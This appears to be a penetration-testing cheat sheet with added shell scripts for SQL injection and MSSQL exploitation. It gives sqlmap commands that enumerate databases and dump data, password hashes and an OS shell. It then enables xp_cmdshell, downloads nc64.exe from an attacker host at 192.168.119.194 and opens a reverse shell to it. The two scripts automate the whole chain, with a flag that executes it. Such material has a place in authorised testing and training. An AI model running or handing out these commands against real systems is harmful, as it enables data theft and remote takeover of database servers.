➤ Specify a DBMS
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbms Oracle
➤ Enumerate the database names
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbs
➤ Enumerate the tables
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D {DATABASE} --tables
➤ Enumerate the columns
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D {DATABASE} -T {TABLE} --columns
➤ Dump columns
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D {DATABASE} -T {TABLE} -C {COLUMN01,COLUMN02,...} --dump
(comma-separated, no spaces: sqlmap splits -C on ',' without trimming)
➤ Get the operating system command shell
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --os-shell
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --os-cmd=whoami
➤ Try to detect and dump the passwords
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --passwords
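The enumeration chain above as one script, added here as an example (not part of the original cheat sheet): the target URL, cookie and DBMS are set once, every run is unattended with --batch, and all session files and dumped CSVs land in one output directory for the report. It assumes sqlmap 1.x on PATH; the URL, cookie, DBMS value and the dvwa/users names are placeholders.

```shell
# Added example (not from the original page): sqlmap enumeration chain as a
# script. Assumptions: sqlmap on PATH; all target values below are
# placeholders taken from the cheat sheet, not a real engagement.
set -eu

TARGET=${TARGET:-'http://10.0.0.1/test?id=1&Submit=Submit'}
COOKIE=${COOKIE:-'security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee'}
DBMS=${DBMS:-MySQL}                 # assumed backend; set to the fingerprinted one to skip detection
OUTDIR=${OUTDIR:-"$PWD/sqlmap-out"} # session files + dumped CSVs, kept as evidence

# Print the full argument list (common flags, then the step's own flags),
# one per line, so a run can be reviewed before it touches the target.
sqlmap_args() {
  printf '%s\n' -u "$TARGET" --cookie="$COOKIE" --dbms="$DBMS" \
    --batch --output-dir="$OUTDIR" "$@"
}

run_sqlmap() {
  sqlmap -u "$TARGET" --cookie="$COOKIE" --dbms="$DBMS" \
    --batch --output-dir="$OUTDIR" "$@"
}

# sqlmap splits -C on ',' without trimming whitespace, so join with commas
# only: "user, password" would ask for a column literally named " password".
# Subshell body so the IFS change does not leak into the caller.
columns_arg() (
  IFS=,
  printf '%s' "$*"
)

# Walk dbs -> tables -> columns -> dump for one database/table.
# Extra arguments are the columns to dump; none means the whole table.
enumerate() {
  db=$1 table=$2; shift 2
  run_sqlmap --dbs
  run_sqlmap -D "$db" --tables
  run_sqlmap -D "$db" -T "$table" --columns
  if [ $# -gt 0 ]; then
    run_sqlmap -D "$db" -T "$table" -C "$(columns_arg "$@")" --dump
  else
    run_sqlmap -D "$db" -T "$table" --dump
  fi
}

# Example invocation with placeholder names; set RUN=1 to actually execute.
if [ "${RUN:-0}" = 1 ]; then
  enumerate dvwa users user password
fi
```

Run it as `RUN=1 TARGET='...' COOKIE='...' sh enum.sh` once the session cookie is fresh; `--batch` accepts sqlmap's default answer to every prompt, so review the injection technique it picked in the output directory's log before trusting the dump.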
➤ Connect directly to the MSSQL instance with sqsh (with credentials in hand)
sqsh -U <user> -P <password> -S <ip:port> -D <database>
ex: sqsh -U sa -P badpassword -S 10.0.0.1:1433 -D bankdb
➤ Enable xp_cmdshell (needs the ALTER SETTINGS server permission, e.g. sysadmin)
If xp_cmdshell is disabled, calling it fails with: "SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online."
1> EXEC SP_CONFIGURE 'show advanced options',1
2> reconfigure
3> go
1> EXEC SP_CONFIGURE 'xp_cmdshell',1
2> reconfigure
3> go
1> xp_cmdshell 'whoami'
2> go
➤ Start a netcat listener on the attacker host (port 443 must match the reverse shell command below)
nc -lvp 443
➤ Serve the reverse shell binary (here nc64.exe) over HTTP from the directory that contains it (default port 8000)
python3 -m http.server 8000
➤ On the database server, fetch the file from the http server (single quotes: with QUOTED_IDENTIFIER ON, "..." is an identifier, not a string)
1> exec xp_cmdshell 'powershell.exe wget http://192.168.119.194:8000/nc64.exe -OutFile c:\Users\Public\nc64.exe'
2> go
➤ Execute the reverse shell (runs as the SQL Server service account; the sqsh session blocks until nc exits)
1> xp_cmdshell 'c:\Users\Public\nc64.exe -e cmd.exe 192.168.119.194 443'
2> go
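The whole sqsh procedure (enable xp_cmdshell, stage nc64.exe, launch the reverse shell) as a non-interactive script, added here as an example and not part of the original cheat sheet. It records the xp_cmdshell setting before touching it and includes the matching restore batch, so the configuration change can be undone at the end of the engagement. It assumes sqsh (FreeTDS) on the attacker host, that nc64.exe is already served from $LHOST:8000 and a listener is running on $LPORT; all hosts, ports and credentials are placeholders taken from the cheat sheet.

```shell
# Added example (not from the original page): xp_cmdshell reverse shell via
# sqsh as a script. Assumptions: sqsh on PATH; placeholders below for the
# target, credentials and attacker host; HTTP server and listener already up.
set -eu

DBHOST=${DBHOST:-10.0.0.1}       # target MSSQL
DBPORT=${DBPORT:-1433}
DBUSER=${DBUSER:-sa}
DBPASS=${DBPASS:-badpassword}
LHOST=${LHOST:-192.168.119.194}  # attacker: HTTP server on 8000, listener on LPORT
LPORT=${LPORT:-443}

# T-SQL: current xp_cmdshell value (0 = off, 1 = on). Read it first so the
# notes record what was found and what gets restored.
state_sql() {
  cat <<'EOF'
SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell'
go
EOF
}

# T-SQL: the sp_configure sequence that clears the "blocked access to
# procedure 'sys.xp_cmdshell'" error. Needs ALTER SETTINGS (e.g. sysadmin).
enable_sql() {
  cat <<'EOF'
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
go
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE
go
EOF
}

# T-SQL: fetch nc64.exe and start the reverse shell. Single quotes only:
# with QUOTED_IDENTIFIER ON, "..." is an identifier, not a string literal.
# xp_cmdshell runs as the SQL Server service account, hence the
# world-writable C:\Users\Public drop path. $1 = LHOST, $2 = LPORT.
stage_sql() {
  cat <<EOF
EXEC xp_cmdshell 'powershell.exe wget http://$1:8000/nc64.exe -OutFile c:\Users\Public\nc64.exe'
go
EXEC xp_cmdshell 'c:\Users\Public\nc64.exe -e cmd.exe $1 $2'
go
EOF
}

# T-SQL: put the server back the way it was (only if state_sql showed 0).
restore_sql() {
  cat <<'EOF'
EXEC sp_configure 'xp_cmdshell', 0
RECONFIGURE
go
EXEC sp_configure 'show advanced options', 0
RECONFIGURE
go
EOF
}

# Feed a batch from stdin to the target through sqsh (-i reads SQL from a file).
sqsh_batch() {
  tmp=$(mktemp)
  cat > "$tmp"
  sqsh -U "$DBUSER" -P "$DBPASS" -S "$DBHOST:$DBPORT" -i "$tmp"
  rm -f "$tmp"
}

main() {
  state_sql | sqsh_batch                  # note the value before changing it
  enable_sql | sqsh_batch
  # The nc batch blocks until nc64.exe exits, so run it in the background
  # and use the listener; the shell arrives on $LHOST:$LPORT.
  stage_sql "$LHOST" "$LPORT" | sqsh_batch &
  echo "reverse shell requested; check the listener on $LHOST:$LPORT"
}

# Set RUN_EXPLOIT=1 to execute against the configured target; RESTORE=1 undoes the change.
if [ "${RUN_EXPLOIT:-0}" = 1 ]; then main; fi
if [ "${RESTORE:-0}" = 1 ]; then restore_sql | sqsh_batch; fi
```

Review each batch with `enable_sql` or `stage_sql 192.168.119.194 443` before running; the password on the sqsh command line is visible in the process list on the attacker host, which matters on shared jump boxes.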